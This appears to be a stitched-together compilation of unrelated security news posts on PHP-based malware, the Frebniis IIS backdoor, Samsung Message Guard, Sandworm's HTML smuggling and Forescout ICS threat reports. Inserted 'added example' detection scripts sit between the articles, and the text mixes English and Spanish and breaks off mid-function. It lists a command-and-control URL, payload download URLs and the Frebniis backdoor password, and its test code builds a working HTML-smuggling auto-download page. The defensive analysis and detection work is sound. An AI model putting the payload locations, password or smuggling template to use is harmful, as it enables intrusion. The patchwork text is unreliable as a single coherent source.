The code connects to https://www.infoamanewonliag.online/api/query every 10 seconds (or at whatever interval the server returns in the "sleep" field) and executes the command returned. Any command output is sent back to the same URL. There are three tasks: (1) execute code, (2) download a file, and (3) schedule execution, which I don't think is completely implemented.
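The polling loop above gives defenders a behavioural signal that survives a change of domain: a host contacting the same destination at a near-constant interval. The following is an added example, not part of the ISC diary: it parses a constructed proxy log (the C2 hostname is the one from the decompiled code; the timestamps, client address and browsing rows are made up), groups requests by client and destination, and flags pairs whose inter-request gaps stay within a small fraction of the median, alongside a plain IoC match on the domain.

```python
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed proxy log: "timestamp client host method path".
SAMPLE_LOG = """\
2023-04-05T10:00:00Z 10.0.0.12 www.infoamanewonliag.online POST /api/query
2023-04-05T10:00:03Z 10.0.0.12 www.example.com GET /
2023-04-05T10:00:05Z 10.0.0.12 www.example.com GET /news
2023-04-05T10:00:10Z 10.0.0.12 www.infoamanewonliag.online POST /api/query
2023-04-05T10:00:21Z 10.0.0.12 www.infoamanewonliag.online POST /api/query
2023-04-05T10:00:31Z 10.0.0.12 www.infoamanewonliag.online POST /api/query
2023-04-05T10:00:40Z 10.0.0.12 www.infoamanewonliag.online POST /api/query
2023-04-05T10:00:47Z 10.0.0.12 www.example.com GET /about
2023-04-05T10:00:50Z 10.0.0.12 www.infoamanewonliag.online POST /api/query
2023-04-05T10:01:01Z 10.0.0.12 www.infoamanewonliag.online POST /api/query
2023-04-05T10:01:11Z 10.0.0.12 www.infoamanewonliag.online POST /api/query
2023-04-05T10:02:30Z 10.0.0.12 www.example.com GET /search
2023-04-05T10:02:31Z 10.0.0.12 www.example.com GET /search?q=x
2023-04-05T10:05:00Z 10.0.0.12 www.example.com GET /
2023-04-05T10:05:02Z 10.0.0.12 www.example.com GET /contact
"""

KNOWN_C2 = {"www.infoamanewonliag.online"}  # the C2 domain used in the decompiled code

Record = Tuple[datetime, str, str, str, str]  # (timestamp, client, host, method, path)


def parse_log(text: str) -> List[Record]:
    """Parse the simple space-separated format used by SAMPLE_LOG."""
    records: List[Record] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, method, path = line.split()
        records.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, host, method, path))
    return records


def beacon_candidates(records: List[Record], min_hits: int = 6,
                      max_jitter: float = 0.2) -> Dict[Tuple[str, str], Dict[str, float]]:
    """(client, host) pairs whose request gaps stay within max_jitter of the median gap."""
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, client, host, _method, _path in records:
        by_pair[(client, host)].append(ts)
    flagged: Dict[Tuple[str, str], Dict[str, float]] = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_hits:          # too few requests to call it a pattern
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        med = statistics.median(gaps)
        if med <= 0:
            continue
        # mean absolute deviation from the median, relative to the median
        jitter = statistics.mean(abs(g - med) for g in gaps) / med
        if jitter <= max_jitter:
            flagged[pair] = {"hits": len(stamps), "median_interval_s": med, "jitter": round(jitter, 3)}
    return flagged


def ioc_hits(records: List[Record], iocs=KNOWN_C2) -> List[Record]:
    """Plain indicator match: every request to a known C2 host."""
    return [r for r in records if r[2] in iocs]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for (client, host), stats in beacon_candidates(recs).items():
        print(f"beacon-like: {client} -> {host} {stats}")
    print(f"IoC matches: {len(ioc_hits(recs))}")
```

The 10-second cadence in the sample is the default from the PHP loop; because the server can change it through the "sleep" field, the check keys on regularity rather than on any fixed interval, and the IoC match is kept as a separate, cheaper signal for the domain that is already known.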
IoCs
Here are some of the IoCs you may use to detect this activity:
SHA256 Hashes (all files can be downloaded from Virustotal and Malwarebazaar)
d4f545691c8441b5bcb86535b1d0fd16dc06786eb4080087588cd4d0f388d5ca installer.exe
882d95bdbca75ab9d13486e477ab76b3978e14d6fca30c11ec368f7e5fa1d0cb update.exe
8ac52ca0792baf2a4075fe7c68e5cbe2262da604e2fcdfb9b39656430925c168 php.7z (not malicious)
3771846f010fcad26d593ea3771bee7cf3dec4d7604a8c719cef500fbf491820 1.php
3033913c51e0bf9a13c7ad2d5a481e174a1a3f19041c339e6ac900824793a1c6 php.vbs
Domains Used:
infoamanewonliag.online - main command and control domain (as it appears in the decompiled code above)
URLs for various code snippets:
https://channel-platform.s3.ap-east-1.amazonaws.com/package/7z.exe
https://channel-platform.s3.ap-east-1.amazonaws.com/package/php.7z
https://channel-platform.s3.ap-east-1.amazonaws.com/package/1.php
https://channel-platform.s3.ap-east-1.amazonaws.com/package/php.vbs
Files on the victim’s system:
C:\ProgramData\Browsers
C:\ProgramData\Browsers\downloads\1.php
C:\ProgramData\Browsers\php\php.exe
Who did it?
I have no idea. Some of the attack infrastructure is hosted with Alibaba in China, and some Chinese comments are in the code. So probably someone Chinese. The code is very cobbled together, and the clumsy inclusion of PHP points to a not-so-advanced, but maybe still persistent, threat actor.
—
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Symantec's Threat Hunter team has discovered new malware named Frebniis that abuses a legitimate feature of Microsoft's Internet Information Services (IIS) web server to install a backdoor on target systems while evading detection by security tools, according to an advisory published by the company.
Internet Information Services (IIS) is Microsoft's flexible, general-purpose web server, which runs on Windows systems to serve requested HTML pages or files. An IIS web server accepts requests from remote client machines and returns the appropriate response. This basic capability lets web servers share and deliver information over local area networks (LANs), such as corporate intranets, and wide area networks (WANs).
A web server can deliver information to users in several forms: static web pages coded in HTML; file exchanges such as downloads and uploads; and text documents, image files and more.
Specifically, IIS offers a feature called FREB (Failed Request Event Buffering) that collects metrics and information about web requests received from remote clients (IP addresses, port numbers, HTTP headers, cookies) to help system administrators troubleshoot failed HTTP requests, retrieving from a buffer the requests that meet certain criteria.
The new malware, named "Frebniis", abuses precisely this legitimate feature to execute malicious code on previously compromised networks, stealthily executing commands sent through web requests.
In the Frebniis attacks observed, the malware first makes sure that FREB is in use, then accesses the IIS process to find out where the target FREB DLL (iisfreb.dll) is loaded.
According to Symantec, the Frebniis authors determined that iiscore.dll calls a specific function pointer inside iisfreb.dll whenever an HTTP request is made to IIS by a web client. The malware then injects code into the IIS process to hijack that function, replacing its pointer with its own malicious code. This hijack point lets Frebniis stealthily receive and inspect every HTTP request to the IIS server before returning to the original function.
By hijacking the IIS function, the HTTP backdoor stays completely hidden on the system while being able to inspect all HTTP requests and pick out the specially formatted ones. Frebniis parses every request to /logon.aspx or /default.aspx that carries a specific parameter, the password, which lets it decrypt and execute .NET code when a password match is found.
That code provides proxying and remote code execution, allowing the malware operators to communicate with internal resources that normally have no Internet access, as well as to execute code directly in memory via crafted HTTP requests.
The malware supports the following commands:
Commands sent to Frebniis through specially crafted HTTP requests. (Source: Symantec)
As mentioned above, the injected code is a .NET backdoor that supports a proxy and the execution of C# code directly in memory, with no human interaction and with the backdoor kept completely invisible. Instructions reach the malware through the parameters passed with HTTP POST authentication requests. If the password value ("7ux4398!") is passed as a parameter in the HTTP request, Frebniis decrypts and executes commands written in a specific section of the injected code that belong to the .NET executable with backdoor functionality.
A second HTTP parameter carrying a Base64-encoded string is then used to drive the proxy functionality (letting the attackers reach resources inside the network through the compromised IIS server, including targets not exposed to the Internet) and remote code execution.
Recommendations to mitigate the risk in organizations
Although the Microsoft 365 Defender Research Team is well aware that attackers increasingly use Internet Information Services (IIS) extensions as a backdoor that gives them a persistence mechanism, there is at the moment no official response from Microsoft regarding this particular malware.
Although it is still unclear how widely Frebniis is actually being used, or how it gains its initial access to Windows systems running IIS, the usual rules still apply: keep devices updated to reduce the chances of a vulnerability being exploited, use network traffic monitoring to help detect unusual activity like this, and regularly review the modules loaded on exposed IIS servers, in particular Exchange servers, using the tools that ship with IIS.
Reference:
https://www.infosecurity-magazine.com/news/frebniis-malware-exploits/
The post Consejos para mitigar amenaza de nuevo malware en servicios IIS (Tips for mitigating the threat of new malware in IIS services) appeared first on CSIRT CEDIA.
Samsung has announced a new sandbox feature called Message Guard, designed to protect devices from zero-click malware attacks, which let an attacker compromise a device without any user interaction. This kind of emerging attack is becoming increasingly common.
Cyberattacks have grown increasingly sophisticated in recent years, as criminals develop and deploy a range of techniques to reach secure systems and exploit vulnerable organizations, pushing defenders to build new data and system protection tools to keep the digital environment secure. One such development is Samsung's new Message Guard feature, designed to protect users from zero-click malware attacks.
Zero-click attacks are sophisticated, highly targeted attacks that exploit unknown flaws (that is, zero-days) in software to trigger the execution of malicious code without requiring any interaction from the user.
Unlike traditional methods of remotely exploiting a device, in which threat actors rely on phishing to trick the user into clicking a malicious link or opening a fraudulent file, these attacks remove the need for social engineering entirely and hand the adversary an entry point.
It is not unusual for the most sophisticated threat actors to target users with exploits that trigger without any action on the victim's part. As an example, Samsung described a scenario in which an attacker sends the target a specially crafted image file that automatically exploits a vulnerability, while the phone sits locked in the user's pocket, to give the attacker access to the victim's messages, photo gallery and banking data.
Most zero-click exploits are designed to take advantage of vulnerabilities in applications such as messaging, SMS or email apps that receive and process untrusted data. As a result, if there is a security flaw in how an application interprets incoming data, a threat actor could exploit that weakness to craft a malicious image that, when sent to a target's device, automatically executes the code embedded in it.
Samsung Message Guard is accordingly an advanced sandbox: when an image file arrives, it is trapped and isolated from the rest of the device. This stops malicious code from accessing the phone's files or interacting with its operating system. Samsung Message Guard checks the file bit by bit and processes it in a controlled environment to ensure it cannot infect the rest of the device. It is the latest security barrier erected by Samsung, alongside the Knox security platform, which according to the company already offers protection against attacks using video and audio formats.
Arquitectura Message Guard: Capas de protección para aislamiento de malware “Zero-click” (Fuente: Cybersecurity Connect)
El nuevo sistema de seguridad se suma a las múltiples capas de protección ya existentes en Samsung, entre las que destaca Samsung Knox, capaz de ofrecer detección de amenazas y protección contra malware en tiempo real.
La función de seguridad, disponible en Samsung Messages y Google Messages, se limita actualmente a la serie Samsung Galaxy S23, con planes para ampliarla a otros smartphones y tabletas Galaxy a finales de este año que funcionen con One UI 5.1 o superior. Además, la compañía ha comentado que implementará próximamente esta solución para que también funcione con aplicaciones de mensajería de terceros, como pueden ser WhatsApp o Telegram.
Por lo tanto, Message Guard es una importante adición a las funciones de seguridad de una organización, ya que proporciona una capa adicional de protección contra los ataques de malware Zero-click. Mediante una combinación de hardware y software, la función puede evitar la ejecución de aplicaciones maliciosas y, a medida que se generalizan este tipo de ataques, es esencial que los fabricantes de dispositivos móviles ofrezcan funciones de seguridad adicionales para proteger a sus usuarios.
Message Guard de Samsung se encuentra activo por defecto y se ejecuta silenciosamente en segundo plano, funcionando contra una amplia serie de formatos de imagen, incluyendo PNG, JPG/JPEG, GIF, ICO, WEBP, BMP y WBMP.
Referencia:
https://thehackernews.com/2023/02/samsung-introduces-new-feature-to.html
La entrada Samsung lanza sistema de protección contra ataques de malware Zero-Click se publicó primero en CSIRT CEDIA.
What Is Malware? Malware, a portmanteau of the words malicious and software, is any software or program that is designed to disrupt and damage a system or network. It is often employed by hackers to purposefully attack an organisation's network. Common Kinds of Malware Malware can work in a variety of ways to achieve the specific … Malware
In 2022, breakthrough evolution in the development of malware targeting industrial control systems (ICS), scaled ransomware attacks against manufacturing, and geopolitical tensions brought increased attention to the industrial cyber threat landscape, according to the 2022 Dragos ICS/OT Cybersecurity Year in Review. As in previous years, the ICS/OT community have managed a growing number of vulnerabilities, […]
Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.
Russia-linked cyberespionage group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.
Multiple security firms have reported that the Sandworm APT continues to target Ukraine with multiple means, including custom malware and botnet like Cyclops Blink.
Sandworm (aka BlackEnergy and TeleBots) has been active since 2000 and operates under the control of Unit 74455 of the Russian GRU's Main Center for Special Technologies (GTsST).
The group is also the author of the NotPetya ransomware that hit hundreds of companies worldwide in June 2017, causing billions worth of damage.
In April, Sandworm targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2) and a new version of the CaddyWiper wiper.
The APT hacking group is believed to have been behind numerous attacks this year, including an attack on Ukrainian energy infrastructure and the deployment of a persistent botnet called “Cyclops Blink” dismantled by the US government in April.
From August 2022, Recorded Future researchers observed a rise in command and control (C2) infrastructure used by Sandworm (tracked by Ukraine’s CERT-UA as UAC-0113).
The researchers observed C2 infrastructure relying on dynamic DNS domains masquerading as Ukrainian telecommunication service providers.
State-sponsored hackers used their infrastructure to deliver multiple malicious payloads via an HTML smuggling technique, including Colibri Loader and Warzone RAT.
“A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113’s broadening but continuing use of publicly available commodity malware.” reads the report published by Recorded Future.
While analyzing the C2 infrastructure Recorded Future discovered that the domain datagroup[.]ddns[.]net reported in CERT-UA’s June report on UAC-0113 was likely masquerading as the Ukrainian telecommunications company Datagroup. The domain resolved to the IP address 31[.]7[.]58[.]82, which was used to host the domain kyiv-star[.]ddns[.]net impersonating another Ukrainian telecommunications company Kyivstar.
Between July and August, the researchers noticed the use of the “ett[.]ddns[.]net” and “ett[.]hopto[.]org” domains likely used to impersonate the LLC Ukrainian telecom operator EuroTransTelecom.
The attack chain starts with spear-phishing messages, pretending to come from a Ukrainian telecommunication provider, sent to the victims in an attempt to trick them into visiting the malicious domains.
The messages are written in Ukrainian and the topics used in the attacks relate to military operations, reports, etc.
Experts noticed the presence of the same web page on multiple domains, it displays the text “ОДЕСЬКА ОБЛАСНА ВІЙСЬКОВА АДМІНІСТРАЦІЯ” which translates as “Odesa Regional Military Administration”, along with “File is downloaded automatically” in English.
The HTML of the webpage contains a base64-encoded ISO file that is automatically downloaded when the website is visited. The threat actors used the HTML smuggling technique. HTML smuggling is a highly evasive technique for malware delivery that leverages legitimate HTML5 and JavaScript features. The malicious payloads are delivered via encoded strings in an HTML attachment or webpage. The malicious HTML code is generated within the browser on the target device which is already inside the security perimeter of the victim’s network.
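Detection logic for the delivery step described above, added here as an example (it is not code from the Recorded Future report or from Security Affairs): it scans an HTML document for a file-sized base64 literal sitting next to the browser-side decode-and-download primitives that HTML smuggling chains together, and identifies what the literal decodes to. The sample pages, the fake ISO image and the file name are all constructed for this example.

```python
import base64
import re
from dataclasses import dataclass, field

# Browser-side primitives that HTML smuggling chains together: decode a literal
# inside the page, wrap it in a Blob, mint an object URL and trigger a download.
SMUGGLING_PRIMITIVES = ("atob(", "new Blob(", "createObjectURL(", ".download", ".click()")

# A quoted base64 literal this long is a file, not an inline icon or a token.
MIN_B64_CHARS = 4096
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{64,}={0,2})[\"']")

# ISO 9660 keeps its primary volume descriptor at sector 16 (offset 0x8000);
# the five bytes after the descriptor type byte are the "CD001" identifier.
ISO_ID_OFFSET = 0x8001
ISO_ID = b"CD001"


@dataclass
class SmugglingVerdict:
    suspicious: bool
    primitives: list = field(default_factory=list)
    literal_chars: int = 0
    payload_kind: str = "none"


def classify_payload(data: bytes) -> str:
    """Magic-number check on the decoded literal: PE, ZIP, ISO or other."""
    if data[:2] == b"MZ":
        return "pe"
    if data[:4] == b"PK\x03\x04":
        return "zip"
    if data[ISO_ID_OFFSET:ISO_ID_OFFSET + len(ISO_ID)] == ISO_ID:
        return "iso"
    return "other"


def inspect_html(html: str) -> SmugglingVerdict:
    """Flag a page that carries a file-sized base64 literal together with at least
    three of the decode-and-download primitives; report what the literal decodes to."""
    found = [p for p in SMUGGLING_PRIMITIVES if p in html]
    longest = max((m.group(1) for m in B64_LITERAL.finditer(html)), key=len, default="")
    kind = "none"
    if longest:
        try:
            kind = classify_payload(base64.b64decode(longest, validate=True))
        except ValueError:  # binascii.Error is a ValueError subclass
            kind = "undecodable"
    suspicious = len(found) >= 3 and len(longest) >= MIN_B64_CHARS
    return SmugglingVerdict(suspicious, found, len(longest), kind)


# --- constructed samples (not real campaign artifacts) ---------------------

def fake_iso_image() -> bytes:
    """Minimal byte layout that classify_payload() recognises as ISO 9660."""
    return bytes(0x8000) + b"\x01" + ISO_ID + b"\x01" + bytes(64)


def smuggling_page(b64: str) -> str:
    """Page in the shape the report describes: banner text, a base64 literal and
    script that decodes it in the browser and starts the download on load."""
    return (
        "<html><body><h1>File is downloaded automatically</h1><script>\n"
        f'var data = "{b64}";\n'
        "var bytes = Uint8Array.from(atob(data), c => c.charCodeAt(0));\n"
        "var url = URL.createObjectURL(new Blob([bytes]));\n"
        'var a = document.createElement("a"); a.href = url; a.download = "doc.iso"; a.click();\n'
        "</script></body></html>"
    )


def benign_page() -> str:
    """Ordinary page with a small inline data URI and no download primitives."""
    icon = base64.b64encode(b"\x89PNG\r\n\x1a\n" + bytes(96)).decode()
    return f'<html><body><img src="data:image/png;base64,{icon}"><p>Hello</p></body></html>'


def demo_smuggled() -> SmugglingVerdict:
    return inspect_html(smuggling_page(base64.b64encode(fake_iso_image()).decode()))


def demo_benign() -> SmugglingVerdict:
    return inspect_html(benign_page())


if __name__ == "__main__":
    for name, verdict in (("smuggled", demo_smuggled()), ("benign", demo_benign())):
        print(name, verdict.suspicious, verdict.payload_kind, verdict.primitives)
```

Because the literal is decoded and typed, the same check also catches ZIP and PE payloads delivered the same way, not only the ISO seen in this campaign.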
The researchers published a report that includes details about the malware and the C2 infrastructure.
The WarZone RAT malware may be old, but it still offers powerful features like a UAC bypass, hidden remote desktop, cookie and password stealing, live keylogger, file operations, reverse proxy, remote shell (CMD), and process management.
Pierluigi Paganini
(SecurityAffairs – hacking, Log4Shell)
The post Russian Sandworm APT impersonates Ukrainian telcos to deliver malware appeared first on Security Affairs.
In our companion blog post, Vedere Labs analyzed the main ransomware trends we observed in the first half of 2022, including state-sponsored ransomware, new mainstream targets and evolving extortion techniques. Ransomware is the main threat targeting most organizations nowadays. However, three other notable cyberthreat trends also evolved during this period:
Threat actors – We saw an almost equal split between cybercriminals and state-sponsored actor activity, with the vast majority of malicious activity perpetrated by Russian or Eastern European actors. The main targeted sectors were government and financial services.
New malware – Significant malware families such as wipers, OT/ICS malware and botnets targeted not only IT systems but also many types of IoT devices.
Active hacking groups – Because of the ongoing conflict in Ukraine, hundreds of hacktivists perpetrated DDoS and other types of attacks. Alongside the politically motivated activity, other large groups focusing on data exfiltration for financial gains have been active.
Below we analyze each of these trends in more detail. This is not an exhaustive discussion of the current threat landscape, but rather a series of observations about the most relevant activity we have seen. As in the related ransomware post, at the end we discuss how you can bolster your current defensive strategies to account for these developments.
Cybercriminals and state-sponsored threat actors
The figures in this section are based on data from the Forescout Device Cloud, one of the world’s largest repositories of connected enterprise device data — including IT, OT and IoT device data — whose number of devices grows daily. The anonymous data comes from Forescout customer deployments and contains information about almost 19 million devices. More specifically, we look at requests to known malicious domains originating from our customer networks between January 1 and April 20, then match them to known advanced persistent threats (APTs).
Figure 1 shows the percentage of malicious requests based on the threat actor’s country of origin. Russia and Eastern Europe host an overwhelming majority (83%) of the threat actors we observed, followed by China (9%) and Pakistan (5%).
We have observed in total 19 threat actors active on monitored networks in the first half of 2022. Known state-sponsored actors accounted for 53% of the activity we observed, and the remaining 47% was due to cybercriminal groups.
The top observed actors were APT29/Cozy Bear, IcedID/Lunar Spider, Evil Corp/Indrik Spider, FIN7/Carbon Spider and Temper Panda. The first four are based in Russia while the last is based in China. The first and last are state-sponsored actors, while the three in the middle are cybercriminals.
The observed actors targeted many different sectors, as shown in Figure 2. Government networks were targeted most often (41%), followed by financial services (28%). Both sectors have long been preferred targets for cyber activities.
Figure 2 – Malicious requests by targeted sector
New malware – wipers, OT/ICS malware and botnets
Vedere Labs observes thousands of new exploit and malware samples every day, either from public sources or from attacks on our Adversary Engagement Environment, a set of publicly accessible honeypots. Most of these artifacts are variations of known malicious tools, including WannaCry samples – which are still very much active even five years after the initial infections – and exploit attempts on Log4j vulnerabilities – which have recently been declared endemic by a new DHS Cyber Safety Review Board.
The most interesting malware developments typically garner attention because of new malicious capabilities, who is deploying the malware or whom it is targeting – and often because of a combination of the three aspects. Beyond several previously covered ransomware families, the first half of 2022 saw many new relevant malware instances.
Destructive wipers
Several wipers were used for sabotage or to destroy evidence as part of the ongoing conflict in Ukraine. This type of malware typically overwrites or encrypts either files or the master boot record (MBR)/master file table (MFT) of a system. Since their impact is similar to ransomware, often attackers disguise the malware as ransomware by adding fake ransom notes to mislead incident responders or to hide their motivations. The most interesting wiper detected so far this year was AcidRain, which was used against VIASAT KA-SAT modems on February 24, rendering more than 5,000 wind turbines in Germany unable to communicate.
OT/ICS-specific malware
OT/ICS malware continues to abuse insecure-by-design native capabilities of OT equipment. Industroyer2 and INCONTROLLER, two new samples of OT/ICS-specific malware, were disclosed to the public almost simultaneously in mid-April. Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 protocol for electrical substations, while the INCONTROLLER toolkit contains modules to read/write from/to ICS devices using industrial network protocols, such as OPC UA, Modbus, CODESYS and Omron FINS.
Persistent and emerging botnets
Many botnets either appeared, reappeared or became known for the first time in 2022. Emotet, one of the largest botnets ever until its shutdown in 2021, returned with hundreds of thousands of new infections and was distributed in new campaigns using malicious emails. The Cyclops Blink botnet, developed by the Sandworm APT as a possible successor to VPNFilter, had been active since 2019 but was discovered at the beginning of this year and taken down soon after discovery. Keksec, a criminal group known for operating several botnets, such as Gafgyt and Simps, developed and open-sourced a new botnet called EnemyBot reusing code from Mirai and other botnets with several exploits for IoT devices as well as enterprise IT applications.
Remote Access Trojan (RAT)
ZuoRAT is a recent Remote Access Trojan (RAT) that leverages exposed and vulnerable routers for initial infection, enumerates IT devices connected to the network, then uses DNS and HTTP hijacking to install other malware on the identified devices. Disturbingly, this malware can automatically jump from IoT to IT assets. Researchers have speculated that it is operated by a state-sponsored group because of its complexity.
Hacking groups
Two types of hacking groups were active in the first half of 2022: hacktivists and data extortion groups. Hacktivists are mainly politically motivated, especially because of the war in Ukraine. Data extortion groups are very similar to ransomware gangs in that they focus on exfiltrating data and demanding a ransom to not release it publicly. However, they employ different malware and do not operate a ransomware-as-a-service model.
Hacktivists
More than 100 groups have conducted cyberattacks since the beginning of the Russian invasion of Ukraine. The attacks were mostly DDoS, but also included data breaches, the use of wipers and distribution of propaganda. Some groups claimed attacks on critical infrastructure, such as disabling electric vehicle chargers in Moscow and railways in Belarus.
Most of these groups are located in Russia or Ukraine but others are in Belarus, Turkey, Romania, Poland, Portugal and Italy. They usually communicate and coordinate their actions via Twitter or Telegram. Killnet became the most notorious group, using simple DDoS tools to take down websites of critical infrastructure companies in the U.S. and Europe such as airports, banks and government agencies. They also spread propaganda to more than 100,000 members of their Telegram channel.
Data extortion groups
LAPSUS$ is a hacking group that has been active since 2021 and has breached several high-profile organizations, starting with major Brazilian governmental agencies and companies. In 2022 it moved on to global businesses such as Microsoft, Nvidia and Okta. Following a series of arrests in the UK in March, the group has been mostly silent. Of particular interest were the intensive use of stolen credentials and cooperating insiders for their hacks, as well as their strong social media presence. Other groups focusing on data extortion include RansomHouse and Karakurt. The latter is connected to the Conti ransomware gang.
Mitigation recommendations
The proliferation of IoT devices continues to expand the digital terrains of organizations, without commensurate attention to securing them. Both cybercriminals and state-sponsored actors are well aware of this. Therefore, we recommend that mitigation strategies prioritize securing the increased attack surface based on up-to-date threat intelligence.
The mitigations suggested for ransomware also apply to the threats analyzed here. Additional recommendations include:
Segment the network to isolate IT and OT, limiting network connections to only specifically allowed management and engineering workstations – thus decreasing the probability of OT/ICS malware reaching its target. Use an OT-aware DPI-capable monitoring solution to alert on malicious indicators and behaviors, watching internal systems and communications for known hostile actions.
Monitor insider threats, large data transfers and activity in dark nets to prevent or mitigate data leakage by hacktivists and data extortion groups. Monitor especially known data leaks for exposed credentials.
Use strong and unique passwords and employ multifactor authentication whenever possible to ensure that stolen credentials cannot easily be used against your organization.
Follow the NCSC-UK’s guide on Denial of Service attacks, which includes understanding weak points in your service, ensuring that service providers can handle resource exhaustion, scaling the service to handle concurrent sessions, preparing a response plan and stress testing systems regularly.
Identify and patch vulnerable IoT devices to prevent them from being used as part of DDoS botnets. Also change defaults or easily guessable passwords on these IoT devices.
Monitor the traffic of IoT devices to identify those being used as part of distributed attacks.
Besides relying on protection of assets and identification of attacks via intrusion detection, hunt for threats in your network using specific IoCs and known TTPs, such as the use of valid credentials from unknown endpoints followed by large data transfers for hacking groups.
Threat hunting and incident response
Forescout Frontline is a threat hunting, risk identification and incident response service for organizations that lack the internal resources and visibility to defend themselves from or respond to cybersecurity attacks. Forescout Frontline works in close collaboration with Vedere Labs, leveraging the intelligence we provide to identify ongoing attacks in real organizations.
The post Cyberthreat Trends in 2022H1: Threat Actors Observed, New Malware and Active Hacking Groups appeared first on Forescout.
Spyware, ransomware and cryptojacking malware have been increasingly detected on industrial control system (ICS) computers, according to data collected in the first half of 2022 by cybersecurity firm Kaspersky.
In our new threat briefing report, Forescout’s Vedere Labs presents the most detailed public technical analysis of Industroyer2 and INCONTROLLER (also known as PIPEDREAM), the newest examples of ICS-specific malware that were disclosed to the public almost simultaneously, on April 12 and 13. Thankfully, both Industroyer2 and INCONTROLLER were caught before causing physical disruption.
Although there have been previous reports about both malware families analyzed in this research, we present the following new contributions:
Description of a functionality in Industroyer2 to discover the target’s Common Address of ASDU. Despite not being used in the analyzed sample, given its hardcoded configuration, this might have been used in previous reconnaissance stages to gather information about the target.
An analysis of the similarity of the IEC-104 implementation in Industroyer that reveals it is probably a modified version of a publicly available implementation.
The most detailed public description so far of Lazycargo, a part of INCONTROLLER that became publicly available recently and is used to execute other parts of the malware.
In this post, we detail how Forescout helps to protect against the new malware. The full report also contains a list of indicators of compromise (IOCs) and recommended mitigations.
Overview of the new ICS-specific malware
Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 industrial protocol. INCONTROLLER is a full toolkit containing modules to send instructions to or retrieve data from ICS devices using industrial network protocols such as OPC UA, Modbus, CODESYS, Machine Expert Discovery and Omron FINS. Additionally, Industroyer2 has a highly targeted configuration, while INCONTROLLER is much more reusable across different targets.
ICS-specific malware is still very rare compared to commodity malware such as ransomware or banking trojans. Industroyer2 and INCONTROLLER follow previous known examples such as Stuxnet, Havex, BlackEnergy2, Industroyer and TRITON, shown in the timeline below.
Industroyer2 is believed to be developed and deployed by the Sandworm APT, linked to the Russian GRU, which was behind the original attacks on the Ukrainian power grid in 2015 and 2016. The Industroyer2 incident follows recent activity against the APT in 2022, such as the disruption of the Cyclops Blink botnet. There is still no conclusive evidence about the actors behind INCONTROLLER, their motives or objectives.
Both new malware families show that abusing often insecure-by-design native capabilities of OT equipment continues to be the preferred modus operandi of real-world attackers. Vedere Labs recently disclosed a set of 56 insecure-by-design vulnerabilities in OT equipment called OT:ICEFALL, which included Omron controllers that were targeted by INCONTROLLER. The emergence of new vulnerabilities and new malware exploiting the insecure-by-design nature of OT supports the need for robust OT-aware network monitoring and deep packet inspection capabilities.
For more information and technical analysis, read the full report.
Mitigation recommendations for ICS malware
Forescout eyeInspect customers can follow the recommendations below to help ensure they are protected against Industroyer2 and INCONTROLLER.
Stay current with the release of additional content such as scripts and IOCs on the OT Portal or through your Forescout representatives.
Monitor network exposure for control systems and HMIs.
Monitor connections to devices outside of documented norms for the device and environment, with special attention to HTTP and Telnet connections to these devices.
Monitor unauthorized Telnet connection attempts, including the use of default credentials.
Detect ICMP usage, and especially possible ping sweeps, through the ICMP indicators in the Industrial Threat Library devoted to detecting possible port scans and discovery activity.
Apply additional configurations on eyeInspect to perform intrusion detection on known nodes. Available approaches include protocol blacklisting and communication whitelisting with traffic rules.
Leverage the Threat Detection Add-Ons script, which contains additional checks for lateral movement and user account manipulation that may reveal attempts to gain administrative rights.
Closely monitor the protocols abused by both new malware families for signs of anomalies: IEC-104 (2404/TCP), OPC UA (4840/TCP, 4843/TCP), Modbus (502/TCP), Machine Expert Discovery (27126/UDP, 27127/UDP), CODESYS (1740-1743/UDP, 11740-11743/TCP, 1105/TCP) and Omron FINS (9600/TCP, 9600/UDP). Below are specific recommendations for each protocol in eyeInspect.
IEC-104
eyeInspect has extensive coverage of IEC-104 anomalies with malformed packet detection (possible indicator of exploit), anomaly baselining detection and a vast Industrial Threat Library covering anomalous behaviors, dangerous operations and much more.
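The kind of IEC-104 inspection described here and in the Industroyer2 analysis above (a dedicated IEC-104 module, plus a routine to discover the target's Common Address of ASDU), as an added example that is not Forescout's or eyeInspect's code: a minimal APDU parser for traffic on 2404/TCP that flags activated control commands and interrogation fan-out across more stations than a legitimate master would query. The capture, the allowed CASDU list and the IOA/CASDU values are constructed for this example.

```python
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

START = 0x68
COT_ACTIVATION = 6
# Type identifiers (IEC 60870-5-101/104) a substation monitor cares about:
# commands in the control direction and the station interrogation command.
TYPE_NAMES = {
    45: "C_SC_NA_1 single command",
    46: "C_DC_NA_1 double command",
    47: "C_RC_NA_1 regulating step command",
    58: "C_SC_TA_1 single command with time tag",
    59: "C_DC_TA_1 double command with time tag",
    100: "C_IC_NA_1 interrogation command",
}
CONTROL_TYPES = {45, 46, 47, 58, 59}


@dataclass
class Asdu:
    type_id: int
    num_objects: int
    cot: int                 # cause of transmission (low 6 bits of the COT octet)
    originator: int
    common_address: int      # CASDU: the station the ASDU is addressed to
    ioa: Optional[int]       # first information object address, if present


def parse_apdu(frame: bytes) -> Optional[Asdu]:
    """Parse one APDU. Returns the ASDU for I-format frames, None for S/U frames."""
    if len(frame) < 6 or frame[0] != START or frame[1] != len(frame) - 2:
        raise ValueError("not a well-formed IEC-104 APDU")
    if frame[2] & 0x01:      # control octet 1, bit 0 set: S- or U-format, no ASDU
        return None
    body = frame[6:]
    if len(body) < 6:
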